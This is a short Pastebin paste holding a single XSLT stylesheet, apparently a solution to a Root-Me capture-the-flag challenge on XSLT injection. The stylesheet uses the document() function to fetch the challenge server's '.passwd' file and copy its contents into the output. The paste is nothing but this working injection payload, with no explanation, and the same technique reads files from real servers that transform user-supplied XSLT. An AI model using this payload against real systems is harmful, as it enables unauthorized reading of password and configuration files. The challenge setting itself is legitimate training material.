Advertisement
Guest User

Untitled

a guest
Nov 19th, 2019
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  2. <xsl:template match="/">
  3. <xsl:copy-of select="document('http://challenge01.root-me.org/web-serveur/ch50/.passwd')"/>
  4. </xsl:template>
  5. </xsl:stylesheet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement